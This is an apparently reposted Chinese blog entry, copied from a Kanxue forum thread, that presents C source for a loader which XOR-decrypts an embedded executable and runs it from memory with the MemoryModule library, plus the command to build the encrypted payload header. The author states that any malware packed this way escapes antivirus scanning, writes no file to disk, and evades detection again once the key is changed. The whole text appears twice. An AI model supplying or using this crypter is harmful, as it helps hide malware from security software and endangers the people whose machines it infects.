支持64位系统的XOR加密后内存加载PE绕过杀毒软件
生活随笔
收集整理的這篇文章主要介紹了
支持64位系统的XOR加密后内存加载PE绕过杀毒软件
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
http://bbs.pediy.com/showthread.php?t=203910
絕對自動支持32、64位的內存加載源碼
無聊逛看雪時,看到了這個。
然后到github上找到了源。就是這里:https://github.com/fancycode/MemoryModule
結合我幾年前寫的一個利用方法:https://github.com/eric21/MemPE
使用方法超級簡單:
#include?<windows.h> #include?<tchar.h> #include?<stdio.h> #include?<malloc.h> #include?"MemoryModule.h" #include?"res\a.h" int?RunForAarray(void) { ??HMEMORYMODULE?handle; ??int?result?=?-1; ??for?(int?i?=?0;?i?<?sizeof(aArray);?i++) ??{ ????//szArray[i]?=?~?szArray[i];?//?取反?~ ????aArray[i]?=?aArray[i]?^?123;?//?異或?^ ??} ??handle?=?MemoryLoadLibrary(aArray); ??if?(handle?==?NULL) ??{ ????//_tprintf(_T("Can't?load?library?from?memory.\n")); ????goto?exit; ??} ??result?=?MemoryCallEntryPoint(handle); ??if?(result?<?0)?{ ????//_tprintf(_T("Could?not?execute?entry?point:?%d\n"),?result); ??} ??MemoryFreeLibrary(handle); exit: ??if?(aArray) ????free(aArray); ??return?result; } int?main(int?argc,?char*?argv[]) { ????return?RunForAarray(); }
res目錄下a.h文件生成方法:EncryptFile.exe?1.exe?a.h?aArray?123
生成的加密key和loader的解密key一致即可,這里演示用,均為123
理論上可以通過異或加密后將任意malware保存在loader內,不會被安全軟件查殺,解密后加載內存,不會產生文件,只要更換加密key,就可以實現再次免殺。
注意:過不了主動防御。
重要聲明:此文章僅供學習交流,請勿用于非法用途!
?支持64位系統的XOR加密后內存加載PE繞過殺毒軟件.rar
不知道還有多少人記得我,已經離開安全圈子很多年了,
偶爾回來看看,發現很多人依然在堅持,讓我十分佩服。
喜歡研究Malware的同好可以聯系我? http://www.eric21.com/about
絕對自動支持32、64位的內存加載源碼
無聊逛看雪時,看到了這個。
然后到github上找到了源。就是這里:https://github.com/fancycode/MemoryModule
結合我幾年前寫的一個利用方法:https://github.com/eric21/MemPE
使用方法超級簡單:
#include?<windows.h> #include?<tchar.h> #include?<stdio.h> #include?<malloc.h> #include?"MemoryModule.h" #include?"res\a.h" int?RunForAarray(void) { ??HMEMORYMODULE?handle; ??int?result?=?-1; ??for?(int?i?=?0;?i?<?sizeof(aArray);?i++) ??{ ????//szArray[i]?=?~?szArray[i];?//?取反?~ ????aArray[i]?=?aArray[i]?^?123;?//?異或?^ ??} ??handle?=?MemoryLoadLibrary(aArray); ??if?(handle?==?NULL) ??{ ????//_tprintf(_T("Can't?load?library?from?memory.\n")); ????goto?exit; ??} ??result?=?MemoryCallEntryPoint(handle); ??if?(result?<?0)?{ ????//_tprintf(_T("Could?not?execute?entry?point:?%d\n"),?result); ??} ??MemoryFreeLibrary(handle); exit: ??if?(aArray) ????free(aArray); ??return?result; } int?main(int?argc,?char*?argv[]) { ????return?RunForAarray(); }
res目錄下a.h文件生成方法:EncryptFile.exe?1.exe?a.h?aArray?123
生成的加密key和loader的解密key一致即可,這里演示用,均為123
理論上可以通過異或加密后將任意malware保存在loader內,不會被安全軟件查殺,解密后加載內存,不會產生文件,只要更換加密key,就可以實現再次免殺。
注意:過不了主動防御。
重要聲明:此文章僅供學習交流,請勿用于非法用途!
?支持64位系統的XOR加密后內存加載PE繞過殺毒軟件.rar
不知道還有多少人記得我,已經離開安全圈子很多年了,
偶爾回來看看,發現很多人依然在堅持,讓我十分佩服。
喜歡研究Malware的同好可以聯系我? http://www.eric21.com/about
總結
以上是生活随笔為你收集整理的支持64位系统的XOR加密后内存加载PE绕过杀毒软件的全部內容,希望文章能夠幫你解決所遇到的問題。
